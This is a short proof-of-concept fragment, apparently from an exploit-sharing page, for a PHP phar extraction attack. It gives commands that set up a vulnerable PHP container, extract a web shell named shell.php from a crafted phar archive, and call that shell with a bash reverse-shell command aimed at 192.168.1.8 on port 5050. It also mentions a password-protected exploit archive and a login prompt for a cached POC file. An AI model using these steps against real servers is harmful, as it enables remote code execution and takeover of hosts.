sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash
echo "phar.readonly = Off" >> /usr/local/etc/php/php.ini
http://localhost:8080/shell.php?cmd=bash -c 'bash -i >%26 /dev/tcp/192.168.1.8/5050 0>%261'
php -r "\$phar = new Phar('exploit.phar'); \$phar->extractTo('./', 'shell.php');"
exploit.zip
pass: infected
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view